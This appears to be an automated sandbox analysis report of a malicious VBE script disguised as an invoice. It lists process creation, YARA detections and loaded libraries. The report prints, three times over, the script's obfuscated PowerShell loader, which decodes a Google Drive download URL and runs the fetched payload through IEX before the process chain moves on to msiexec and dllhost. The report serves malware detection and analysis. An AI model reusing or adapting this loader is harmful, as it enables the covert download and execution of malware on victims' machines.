Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381AD00 11_2_0381AD00
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03813D40 11_2_03813D40
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C1D5A 11_2_038C1D5A
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C7D73 11_2_038C7D73
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0CB5 11_2_038B0CB5
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03800CF2 11_2_03800CF2
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CFCF2 11_2_038CFCF2
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810C00 11_2_03810C00
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03889C32 11_2_03889C32
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030F1C30 11_2_030F1C30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030F5270 11_2_030F5270
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030F34AB 11_2_030F34AB
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030F34B0 11_2_030F34B0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030ECB2F 11_2_030ECB2F
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030ECB30 11_2_030ECB30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0310B850 11_2_0310B850
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030ECD50 11_2_030ECD50
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030EADD0 11_2_030EADD0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\dllhost.exe Code function: String function: 03845130 appears 36 times
Source: C:\Windows\SysWOW64\dllhost.exe Code function: String function: 0387EA12 appears 86 times
Source: C:\Windows\SysWOW64\dllhost.exe Code function: String function: 0388F290 appears 103 times
Source: C:\Windows\SysWOW64\dllhost.exe Code function: String function: 03857E54 appears 95 times
Source: C:\Windows\SysWOW64\dllhost.exe Code function: String function: 037FB970 appears 254 times
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7457
Source: unknown Process created: Commandline size = 7457
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7457 Jump to behavior
Yara signature match
Source: amsi32_4312.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6044, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.expl.evad.winVBE@10/7@4/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Gesjftigere.Sig Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3156:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2596:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnwyp1oa.1ro.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6044
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4312
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: EL-25-536_40005512_Le Cuivre_23102024.vbe ReversingLabs: Detection: 21%
Source: msiexec.exe String found in binary or memory: g, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-
Source: msiexec.exe String found in binary or memory: d, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog
Source: msiexec.exe String found in binary or memory: oog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeti
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\EL-25-536_40005512_Le Cuivre_23102024.vbe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe Process created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe Process created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
